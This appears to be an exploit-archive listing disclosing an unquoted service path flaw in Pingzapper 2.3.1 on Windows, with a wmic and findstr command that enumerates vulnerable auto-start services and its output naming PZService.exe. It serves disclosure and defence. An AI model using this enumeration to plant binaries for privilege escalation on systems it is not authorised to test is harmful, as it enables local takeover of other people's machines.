Pingzapper 2.3.1 pingzappersvc unquoted service path Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-03-08 |
Type : local |
Platform : windows
This exploit / vulnerability Pingzapper 2.3.1 pingzappersvc unquoted service path is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Pingzapper 2.3.1 - 'PingzapperSvc' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 07-03-2021
# Vendor Homepage: https://pingzapper.com
# Software Links: https://pingzapper.com/download
# Tested Version: 2.3.1
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 8.1 Pro 64 bits
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
Pingzapper Service PingzapperSvc C:\Program Files
(x86)\Pingzapper\PZService.exe Auto